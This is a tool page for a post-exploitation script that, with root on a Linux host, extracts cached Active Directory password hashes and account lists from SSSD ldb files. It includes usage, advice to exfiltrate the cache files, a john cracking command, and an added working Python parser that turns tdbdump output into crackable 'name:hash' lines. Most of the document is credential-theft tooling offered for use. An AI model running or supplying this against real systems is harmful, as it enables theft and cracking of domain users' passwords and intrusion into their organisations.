Tool: SSSD Extract

With this tool it is possible to extract Active Directory account password hashes from a Linux host when credential caching is enabled in SSSD (cache_credentials = True in sssd.conf). It also lists every user, group and machine account cached in the SSSD database, which can be useful in post-exploitation activities. The cache lives in ldb files that are readable only by root, so the tool needs root on the target.

zsh sssd-extract.sh [$FolderPath]

Without arguments it uses the SSSD default path "/var/lib/sss/db/", but you can pass a different one. If tdbdump is not installed, the script only lists the ldb files that contain the hashes; you can install it with apt install tdb-tools or exfiltrate those files:

On a system with tdbdump installed the script will:

  1. Extract the cached accounts and their hashes and write them to hashes.txt. The hashes are sha512crypt (hashcat mode 1800), so they can be cracked with Hashcat or John the Ripper:

    john hashes.txt --format=sha512crypt
    
  2. Extract all the AD groups, users and machine accounts cached in the ldb file and save them to domain.txt.

*A better approach is to copy the ldb file to your attacking machine and run the script there, which avoids installing tools on the target.
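As an added example (not the SSSD Extract script and not part of the original page), the following Python reads the text that tdbdump prints for a cache_<domain>.ldb file and produces the same two outputs described above: john/hashcat-ready "name:hash" lines and a list of cached users, machines and groups. It assumes tdbdump's output shape (key(N) = "..." / data(N) = "...", with non-printable bytes, quotes and backslashes escaped as \XX), that ldb keys are "DN=" plus the casefolded DN with accounts under cn=users and cn=groups, and that the cached credential is a printable sha512crypt string, which is located by pattern so the ldb record packing never has to be decoded. The embedded SAMPLE_DUMP is constructed to that shape with simplified record bodies; it is not a real dump and its hash is a placeholder, not a real password hash.

```python
#!/usr/bin/env python3
"""Turn `tdbdump cache_<domain>.ldb` output into john/hashcat input.

Usage:  tdbdump /var/lib/sss/db/cache_example.com.ldb | python3 sssd_dump.py
        python3 sssd_dump.py          (no piped stdin: runs on the constructed sample)
Added example; the layout assumptions are listed in the comments below.
"""
import re
import sys

# One tdbdump record: key(N) = "..." followed by data(N) = "...". Bytes that
# are non-printable, '"' or '\' are escaped as \XX, so neither field holds a
# raw quote and the declared lengths are not needed for parsing (assumption).
RECORD_RE = re.compile(r'key\(\d+\) = "([^"]*)"\s*data\(\d+\) = "([^"]*)"')
ESCAPE_RE = re.compile(rb"\\([0-9A-Fa-f]{2})")
# ldb keys are "DN=" + casefolded DN; sysdb keeps accounts under cn=users and
# cn=groups of the domain (assumption about the on-disk layout).
KEY_RE = re.compile(r"^DN=NAME=([^,]+),CN=(USERS|GROUPS),", re.I)
# sha512crypt as stored in the cachedPassword attribute: $6$[rounds=N$]salt$86chars
HASH_RE = re.compile(rb"\$6\$(?:rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}")

# Constructed tdbdump-style listing: an index record, a user with a cached
# hash, a machine account and a group. Record bodies are simplified, not real
# ldb packing, and the hash is a placeholder.
SAMPLE_DUMP = r'''{
key(13) = "DN=@INDEXLIST"
data(4) = "\00\00\00\00"
}
{
key(57) = "DN=NAME=JDOE@EXAMPLE.COM,CN=USERS,CN=EXAMPLE.COM,CN=SYSDB"
data(160) = "g\19\01&\02\00\00\00name\00\01\00\00\00\10\00\00\00jdoe@example.com\00cachedPassword\00\01\00\00\00b\00\00\00$6$Zy5d1R3q$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./abcdefghijklmnopqrstuv\00"
}
{
key(58) = "DN=NAME=WS01$@EXAMPLE.COM,CN=USERS,CN=EXAMPLE.COM,CN=SYSDB"
data(39) = "g\19\01&\01\00\00\00name\00\01\00\00\00\11\00\00\00ws01$@example.com\00"
}
{
key(67) = "DN=NAME=DOMAIN ADMINS@EXAMPLE.COM,CN=GROUPS,CN=EXAMPLE.COM,CN=SYSDB"
data(47) = "g\19\01&\01\00\00\00name\00\01\00\00\00\19\00\00\00domain admins@example.com\00"
}
'''


def unescape(field: str) -> bytes:
    """Reverse tdbdump's \\XX escaping, giving the raw record bytes."""
    return ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]),
                         field.encode("latin-1"))


def parse_tdbdump(text: str):
    """Yield (key, data_bytes) for every record in a tdbdump listing."""
    for key, data in RECORD_RE.findall(text):
        yield unescape(key).decode("latin-1"), unescape(data)


def original_case(folded: str, data: bytes) -> str:
    """The key holds the casefolded name; recover the stored spelling from the body."""
    m = re.search(re.escape(folded).encode("latin-1"), data, re.I)
    return m.group(0).decode("latin-1") if m else folded.lower()


def extract(text: str) -> dict:
    """Return hashes (name:hash), users, machines and groups found in the dump."""
    out = {"hashes": [], "users": [], "machines": [], "groups": []}
    for key, data in parse_tdbdump(text):
        m = KEY_RE.match(key)
        if not m:
            continue  # @INDEXLIST, @ATTRIBUTES and other non-account records
        name = original_case(m.group(1), data)
        if m.group(2).upper() == "GROUPS":
            out["groups"].append(name)
            continue
        # AD computer objects are cached as users whose name ends in '$'
        bucket = "machines" if name.split("@", 1)[0].endswith("$") else "users"
        out[bucket].append(name)
        for h in HASH_RE.findall(data):
            out["hashes"].append(f"{name}:{h.decode('ascii')}")
    return out


def main():
    text = SAMPLE_DUMP if sys.stdin.isatty() else sys.stdin.read()
    r = extract(text)
    print("# hashes.txt  (john --format=sha512crypt / hashcat -m 1800 --username)")
    print(*r["hashes"], sep="\n")
    print("# domain.txt")
    for kind in ("users", "machines", "groups"):
        for n in r[kind]:
            print(f"{kind[:-1]}\t{n}")


if __name__ == "__main__":
    main()
```

Because the hash is matched by its printable form rather than by walking the ldb packing, the same parser works on a dump taken from the target or on one produced later on the attacking machine from an exfiltrated ldb file; only the cachedPassword value is ever needed for cracking.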


Credit